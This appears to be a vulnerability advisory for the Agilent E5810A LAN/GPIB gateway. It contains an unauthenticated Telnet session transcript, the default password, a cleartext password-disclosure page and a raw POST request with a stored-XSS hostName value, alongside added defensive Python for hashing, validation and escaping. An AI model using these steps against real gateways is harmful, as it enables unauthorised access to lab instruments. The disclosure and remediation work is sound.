Agilent E5810A LAN/GPIB Gateway – Multiple Vulnerabilities

The E5810A LAN/GPIB Gateway from Agilent has several vulnerabilities.

#1 Unauthenticated Telnet Access

According to the manual, the device can also be configured over Telnet, which is kept for backward compatibility:

For backward compatibility with the E2050 LAN/GPIB Gateway, the Telnet Utility functionality is provided with the E5810. However, E5810 Web Access is the preferred method to configure the E5810.

Testing this:

df ~$ telnet 1.2.3.4
Trying 1.2.3.4...
Connected to 1.2.3.4.
Escape character is '^]'.
Welcome to the E5810 LAN/GPIB Gateway Configuration Utility.
Controls GPIB and RS-232 interfaces via the LAN

Commands
? View Available Commands
exit, quit Exit WITHOUT Saving Configuration Changes (see reboot)
reboot Save Configuration Changes and Restart E5810
status View the LAN/GPIB Gateway Connection Status

Read-only E5810 Parameters
hardware-addr: 0030D30969B9 # Ethernet (MAC) Address
serial-num: MY43003219 # Serial Number

Configurable Parameters saved in E5810 non-volatile memory
(Note: Some E5810 current values “in-use” may be different)
dhcp: OFF # Configure LAN for DHCP boot
ip: 1.2.3.4 # Internet Protocol (IP) Address
subnet-mask: 255.255.255.0 # Network Subnet Mask
gateway: 1.2.3.1 # Network Gateway

dns-server: 4.3.2.1 # DNS Server
hostname: # Internet Hostname

description: Agilent E5810 (00-30-D3-09-69-B9) # Device Description (UPnP Friendly Name)
upnp: ON # Configured as UPnP device

lan-timeout: 7200 # LAN Timeout (Keepalive) in sec
io-timeout: 120 # I/O Timeout in seconds

gpib-name: gpib0 # GPIB SICL Interface Name
gpib-address: 21 # GPIB System Controller Address
gpib-unit: 7 # GPIB Logical Unit (LU) Number

rs232-name: COM1 # RS-232 SICL Interface Name
rs232-baud: 9600 # RS-232 Baud Rate
rs232-bits: 8 # RS-232 Bits
rs232-stopbits: 1 # RS-232 Stop Bits
rs232-parity: NONE # RS-232 Parity
rs232-flow: NONE # RS-232 Flow Control
rs232-srq: RI # RS-232 SRQ

> ?
Available commands are:
help View Help Information
? View Available Commands
config View Configured Settings
serial-num View the Device Serial Number
version View the Firmware Revision
hardware-addr View the Ethernet (MAC) Address
dhcp Turn OFF or ON the use of DHCP
ip View/Set the IP Address
subnet-mask View/Set the Network Subnet Mask
gateway View/Set the Gateway Address
dns-server View/Set the DNS Server Address
hostname View/Set the Internet Hostname
description View/Set Device Description (UPnP Friendly Name)
upnp Turn OFF or ON the use of UPnP
lan-timeout View/Set the LAN Timeout (Keepalive). 0 is Off.
io-timeout View/Set the Server I/O Timeout. 0 is Off.
gpib-name View/Set the GPIB SICL Interface Name
gpib-address View/Set the GPIB System Controller Address
gpib-unit View/Set the GPIB Logical Unit Number
rs232-name View/Set the RS-232 SICL Interface Name
rs232-baud View/Set Baud
rs232-bits View/Set number of RS-232 data Bits
rs232-stopbits View/Set number of RS-232 Stop Bits
rs232-parity View/Set the RS-232 Parity
rs232-flow View/Set the RS-232 Flow Control
rs232-srq View/Set the RS-232 SRQ Line
status View the LAN/GPIB Gateway Connection Status
syslog-display View Contents of the Syslog
syslog-clear Clear the Syslog
password Enter the Password (when prompted)
(Password is required when making changes)
changepassword Change the Password (when prompted)
reboot Save Configuration and Reboot E5810
factory-reset Reset Config to Factory Defaults and Reboot
exit Exit WITHOUT Saving Configuration (see reboot)
quit Exit WITHOUT Saving Configuration (see reboot)
bye Exit WITHOUT Saving Configuration (see reboot)

> quit

E5810 Non-UPnP parameters are UNCHANGED.
Telnet session will end.

Connection closed by foreign host.
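The session above shows the gateway printing its MAC, serial number and network configuration before any password is asked for. For anyone who has to inventory lab equipment, the banner format is simple enough to parse. The following is an example added to this write-up, not Agilent code: it parses the `key: value # comment` lines the gateway prints and reports which of them were disclosed without authentication, and it includes a plain socket banner read for checking your own devices. The sample banner is constructed from the session above, using the same placeholder addresses.

```python
"""Parse the E5810 Telnet configuration banner and flag what it discloses
before any password is entered. Added example; not Agilent's code."""
import re
import socket

# Constructed sample: the unauthenticated banner as shown in the session above.
SAMPLE_BANNER = """Welcome to the E5810 LAN/GPIB Gateway Configuration Utility.
Controls GPIB and RS-232 interfaces via the LAN

Read-only E5810 Parameters
hardware-addr: 0030D30969B9 # Ethernet (MAC) Address
serial-num: MY43003219 # Serial Number

Configurable Parameters saved in E5810 non-volatile memory
dhcp: OFF # Configure LAN for DHCP boot
ip: 1.2.3.4 # Internet Protocol (IP) Address
subnet-mask: 255.255.255.0 # Network Subnet Mask
gateway: 1.2.3.1 # Network Gateway
dns-server: 4.3.2.1 # DNS Server
hostname: # Internet Hostname
upnp: ON # Configured as UPnP device
gpib-address: 21 # GPIB System Controller Address
"""

# "key: value # comment"; the value may be empty (hostname above).
PARAM_RE = re.compile(r"^([a-z0-9-]+):\s*(.*?)\s*(?:#.*)?$")

# Parameters that identify the device or describe its network placement.
SENSITIVE_KEYS = {"hardware-addr", "serial-num", "ip", "gateway", "dns-server", "upnp"}


def parse_banner(text):
    """Return {parameter: value} for every 'key: value' line in the banner."""
    params = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = PARAM_RE.match(line)
        if m:
            params[m.group(1)] = m.group(2)
    return params


def is_e5810(text):
    """True when the banner is the E5810 configuration utility greeting."""
    return "E5810 LAN/GPIB Gateway Configuration Utility" in text


def unauthenticated_disclosure(text):
    """Sensitive parameters the gateway printed before prompting for a password."""
    params = parse_banner(text)
    return {k: v for k, v in params.items() if k in SENSITIVE_KEYS}


def read_banner(host, port=23, timeout=3.0):
    """Connect to a gateway you administer and return whatever it prints
    on connect (assumed: the banner arrives within the timeout)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.settimeout(timeout)
        chunks = []
        try:
            while True:
                data = s.recv(4096)
                if not data:
                    break
                chunks.append(data)
        except socket.timeout:
            pass
    return b"".join(chunks).decode("ascii", errors="replace")


if __name__ == "__main__":
    for key, value in sorted(unauthenticated_disclosure(SAMPLE_BANNER).items()):
        print(f"{key}: {value!r}")
```

Because the banner is printed on connect, the practical mitigation is at the network layer: keep the gateway on an isolated instrument VLAN and block TCP/23 from everywhere else, since the telnet utility itself has no option to require a login before printing the configuration.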

#2 Default Password for Web Interface

From the manual:

The E5810 uses these default configuration values until you set any other configuration values.
Password: E5810

#3 password.html Cleartext Password Disclosure

Whatever the password has been set to, the password.html page sends the current value to the browser. It is only obscured with JavaScript, so viewing the page source reveals it:

http://1.2.3.4/html/password.html

[screenshot: agilent01]

[screenshot: agilent02]
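The two findings above have one root cause: the device keeps the password in a form it can hand back to the browser, and nothing on the page needs it. The following is an example added here (not the gateway's firmware) of how a change-password page should treat the secret: store only a salted PBKDF2 hash, verify the old password on the server with a constant-time comparison, and render the form without ever embedding the current value. Only the default `E5810` comes from the manual; the iteration count, field names and minimum length are assumptions for the example.

```python
"""Password handling that never sends the secret to the browser.
Added example, not Agilent's firmware."""
import hashlib
import hmac
import os

FACTORY_DEFAULT = "E5810"   # documented default, quoted from the manual above
MIN_LENGTH = 8              # assumption for this example
ITERATIONS = 100_000        # assumption; tune to the device's CPU budget


def hash_password(password, salt=None, iterations=ITERATIONS):
    """Salted PBKDF2-HMAC-SHA256; returns (salt, digest)."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt, digest


def new_store(password, iterations=ITERATIONS):
    """What the device would persist: salt, digest and the iteration count."""
    salt, digest = hash_password(password, iterations=iterations)
    return {"salt": salt, "digest": digest, "iterations": iterations}


def verify_password(store, candidate):
    """Constant-time comparison so a wrong guess leaks nothing by timing."""
    _, digest = hash_password(candidate, store["salt"], store["iterations"])
    return hmac.compare_digest(digest, store["digest"])


def uses_factory_default(store):
    """True while the device still accepts the documented default password."""
    return verify_password(store, FACTORY_DEFAULT)


def change_password(store, old, new1, new2):
    """Server-side policy for the password form. Returns (ok, message)."""
    if not verify_password(store, old):
        return False, "current password incorrect"
    if new1 != new2:
        return False, "new passwords do not match"
    if len(new1) < MIN_LENGTH or new1 == FACTORY_DEFAULT:
        return False, "new password too weak"
    store.update(new_store(new1, store["iterations"]))
    return True, "password changed"


def render_password_form(store):
    """The HTML the browser receives. The stored secret is not embedded;
    the only thing derived from it is a yes/no warning about the default."""
    warning = ""
    if uses_factory_default(store):
        warning = "<p>Device is using the factory default password.</p>"
    return (
        "<form method='post' action='/html/password.html'>"
        + warning
        + "<input type='password' name='passOld'>"
        "<input type='password' name='pass1'>"
        "<input type='password' name='pass2'>"
        "<input type='submit' value='Save'></form>"
    )


if __name__ == "__main__":
    store = new_store(FACTORY_DEFAULT)
    print(render_password_form(store))
    print(change_password(store, FACTORY_DEFAULT, "lab-gpib-2013", "lab-gpib-2013"))
    print(render_password_form(store))
```

The form still lets the user change the password, which is all password.html needs to do; the old password is checked where the hash lives, not in the browser, so there is nothing for a proxy or "view source" to recover.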

#4 config_lan.html hostName Parameter Stored XSS (CVE-2013-78007)

Open the LAN configuration page and change the hostname. The page's own JavaScript blocks special characters, but that check runs only in the browser, so a proxy can submit an ordinary XSS string directly:

POST /html/config_lan.html HTTP/1.1
User-Agent: Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.15
Host: 1.2.3.4
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Referer: http://1.2.3.4/html/config_lan.html
Proxy-Connection: Keep-Alive
Content-Length: 451
Content-Type: application/x-www-form-urlencoded

Save=+Save+&dhcpSetting=0&ipAddress=1.2.3.4&subnetMask=255.255.255.0&subnetAddress=1.2.3.4&DNSserver=4.3.2.1&hostName=alert('df')&description=Agilent+E5810+%2800-30-D3-09-69-B9%29&UPnPSetting=1&lanTO=7200&ioTO=120&gpibName=gpib0&gpibAddr=21&gpibLU=7&rs232Name=COM1&BaudSetting=9600&ParitySetting=NONE&BitsSetting=8&StopBitsSetting=1&FlowSetting=NONE&SrqSetting=RI&passOld=&curPassOld=E5810&pass1=&pass2=&ContinueOn=True

[screenshot: aglient03-xss]
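The lesson of this finding is that client-side filtering is not validation. The following is an example added to this write-up (not the gateway's firmware) of the two checks that have to happen on the server: reject a hostname that is not a valid RFC 1123 name before storing it, and HTML-escape stored values when they are echoed back into the page, so a value that somehow got stored still cannot run as script. The sample body is cut down from the POST above; the field names come from that request, while the description length limit is an assumption.

```python
"""Server-side validation and output encoding for the config_lan.html form.
Added example; not the gateway's code."""
import html
import re
from urllib.parse import parse_qs

# RFC 1123 host label: 1-63 chars, letters/digits/hyphen, no leading or trailing hyphen.
LABEL_RE = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")
MAX_DESCRIPTION = 64   # assumption for this example

# Constructed from the POST body shown above; hostName carries the injected value.
SAMPLE_BODY = (
    "Save=+Save+&dhcpSetting=0&ipAddress=1.2.3.4&hostName=alert('df')"
    "&description=Agilent+E5810+%2800-30-D3-09-69-B9%29&UPnPSetting=1"
)


def valid_hostname(value):
    """Empty is allowed (the device ships with no hostname); otherwise every
    dot-separated label must be an RFC 1123 label and the name fit in 253 chars."""
    if value == "":
        return True
    if len(value) > 253:
        return False
    return all(LABEL_RE.match(label) for label in value.split("."))


def parse_form(body):
    """Decode the urlencoded body into single-valued fields."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def validate_lan_form(form):
    """Return a list of field errors; an empty list means the form may be stored."""
    errors = []
    if not valid_hostname(form.get("hostName", "")):
        errors.append("hostName: only letters, digits, hyphens and dots are allowed")
    if len(form.get("description", "")) > MAX_DESCRIPTION:
        errors.append("description: too long")
    return errors


def render_lan_page(form):
    """Output encoding: every stored value is escaped when echoed into HTML,
    including quotes, since the values land inside attribute values."""
    host = html.escape(form.get("hostName", ""), quote=True)
    desc = html.escape(form.get("description", ""), quote=True)
    return (
        f"<input name='hostName' value='{host}'>"
        f"<input name='description' value='{desc}'>"
    )


if __name__ == "__main__":
    form = parse_form(SAMPLE_BODY)
    print(validate_lan_form(form))
    print(render_lan_page(form))
```

Run against the sample body, the validator rejects the `hostName` value and the renderer emits it with the quotes and parentheses encoded; a legitimate name such as `e5810-lab01` passes untouched. The browser-side filter can stay for usability, but it is the server check that makes the stored-XSS path go away.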
